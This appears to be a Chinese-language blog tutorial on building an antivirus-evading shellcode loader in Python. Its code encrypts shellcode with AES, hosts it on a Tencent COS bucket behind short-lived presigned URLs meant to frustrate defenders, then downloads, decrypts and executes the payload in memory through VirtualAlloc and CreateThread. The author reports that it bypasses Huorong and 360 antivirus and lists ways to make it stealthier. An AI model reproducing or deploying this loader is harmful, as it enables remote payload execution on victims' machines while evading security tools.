cos远程加载器编写

背景

在免杀的过程中，分离免杀因为其加载器和shellcode分离的原因让特征不明显，分离免杀成为了现在的主流免杀方式了。

思路

两个脚本，一个负责预处理，一个负责加载。

预处理

加密（shellcode，url，密钥），文件上传并返回下载链接，随机生成加密key

1.读取配置文件，获取secret_id，secret_key，存储桶地址

2.随机生成key

3.使用生成的key将shellcode加密

4.将加密后的shellcode存储到本地txt文件中

4.使用oss的公开api将txt上传到存储桶中，并且返回随机生成的url

5.将url与key写入另一个json文件。

加载器

访问下载链接并提取shellode，解密

1.获取key和url

2.解密url

3.访问url 将加密后的shellcode拉到本地

4.使用key解密shellcode

5.将shellcode加载进内存执行

解析

预处理

首先我们需要去创建一个存储筒，我用的是腾讯云cos存储筒。因为使用的是python语言，所以我们需要按照官方上的sdk教程去调用对象存储功能。

预处理由三个部分组成，分别为读取存储筒文件，加密手段，上传文件三个部分。

def getConfig():
    # 获取配置文件
    with open('config.json', 'r+') as read:
        config = read.read()
        read.close()
    config = json.loads(config)
    secret_id = config['secret_id']
    secret_key = config['secret_key']
    url = config['url']
    return secret_id, secret_key, url

加密我采用的是很简单的AES ECB加密。该加密只需要使用一个公钥便可以加解密我们的内容，方便快捷。但是我们需要注意的是，每一次运行都随机生成我们的公钥。

def getIv():
    all_char = '0123456789qazwsxedcrfvtgbyhnujmikolpQAZWSXEDCRFVTGBYHNUJIKOLP'
    password = ''
    for i in range(16):
        password += random.choice(list(all_char))
    return password

def ecbEncrypt(password, text):
    password = password  # 秘钥，b就是表示为bytes类型
    text = text  # 需要加密的内容，bytes类型
    aes = AES.new(password, AES.MODE_ECB)  # 创建一个aes对象
    # AES.MODE_ECB 表示模式是ECB模式
    en_text = aes.encrypt(text)  # 加密明文
    print("密文：", en_text)  # 加密明文，bytes类型
    return en_text

上传文件使用的就是官方上简单上传的api，首先把加密后的shellcdoe写成一个名为123.txt文件，调用api上传该文件至筒中。随后返回一个下载该文件的url。这里可以把该url有效期设置为一小时，防止以后蓝队查到了，但是已经没有效果了。同时对返回回来的url也做了一定程度的加密。

def upload(miwen):
    # 写入文件,并且上传
    file_name = "123.txt"
    with open(file_name, 'wb+') as write:
        write.write(miwen)
        write.close()

    with open(file_name, 'rb') as read:
        response = client.put_object(
            Bucket='cosjiazai-..........',  # Bucket 由 BucketName-APPID 组成
            Body=read,
            Key=file_name,
            StorageClass='STANDARD',
            ContentType='text/html; charset=utf-8'
        )
        # print(response['ETag'])

        # 生成下载URL
        url = client.get_presigned_url(
            Method='GET',
            Bucket='cosjiazai-..................',
            Key='123.txt',
            Expired=3600  # 一小时后过期
        )

        # 对临时链接进行base32加密
        print(url)
        url = url.encode('utf-8')
        url = base64.b32encode(url)
        return url

运行该py文件后，可以见到已经上传至筒中。

同时，预处理文件也会把加密后的url和key写入另外一个json文件用来让加载器进行读写。

#生成存放密钥与url地址的文件
   target_dict = {'key':str(password),'url':str(download_url)}
   target=json.dumps(target_dict)
   with open('target.json',"w+",encoding='utf-8') as fwrite:
       fwrite.write(target)
       fwrite.close()

加载器

加载器的功能依然有加载配置文件，解密过程,加载进内存的手段

加载配置文件：

# 获取密钥
def getinfo():
    with open('target.json', "r+", encoding='utf-8') as fread:
        read = fread.read()
        fread.close()
        return read
    
if __name__ == '__main__':  
target=getinfo()
    target_dict = json.loads(target)
    password = target_dict['key']
    url = target_dict['url']
    password = password.replace('b\'','')
    password = password.replace('\'', '')
    password=password.encode('utf-8')
    url = url.replace('b\'', '')
    url = url.replace('\'', '')
    url = base64.b32decode(url)
    url = url.decode('utf-8')  #这里完全是因为不知道更好的方式来转换所以才用了这么多方法。
    

解密过程

def ecbDncrypt(password, text):
    password = password  # 秘钥，b就是表示为bytes类型
    en_text = text  # 需要解密的内容，bytes类型
    aes = AES.new(password, AES.MODE_ECB)  # 创建一个aes对象
    den_text = aes.decrypt(en_text)  # 解密密文
    return den_text

加载进内存

def shellCodeLoad(shellcode):
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64  # 指定virtualloc函数的返回值类型
    # 定义virtualloc函数,为什么它的参数fiallocationtype要指定为0x3000，它是0x1000和0x2000给它加起来。即又申请了到物理内存，又申请到虚拟内存。
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
    # 把shell写入缓冲区
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    # 调用rtlmovememort函数，把shellcode从缓冲区移动到申请的虚拟内存
    ctypes.windll.kernel32.RtlCopyMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
    # 制造线程，第三个参数即我们需要调用的线程函数地址
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr),
                                                 ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))

    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

结果展示

物理机上是安装的火绒，虚拟机上是安装的360。都可以全过。

可以改进的方向

1. 加密使用的是很简单的AES ECB加密，可以使用复杂一些的加密。
2. 可以让在执行预处理的阶段，使用pyinstaller来自动编译加载器，避免手动用命令行来做。
3. 可以把加载器改为接受传参式。这样就可以避免要考两个文件上别人主机的尴尬情况。